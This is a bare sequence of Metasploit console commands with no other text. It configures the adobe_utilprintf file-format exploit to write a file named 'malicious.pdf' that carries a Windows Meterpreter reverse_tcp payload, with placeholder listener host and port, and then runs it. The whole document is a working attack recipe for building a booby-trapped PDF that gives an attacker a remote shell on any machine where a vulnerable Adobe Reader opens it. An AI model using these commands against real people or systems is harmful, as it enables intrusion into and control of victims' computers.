use exploit/windows/fileformat/adobe_utilprintf set FILENAME malicious.pdf set PAYLOAD windows/meterpreter/reverse_tcp set LHOST listening_ip set LPORT tcp_port exploit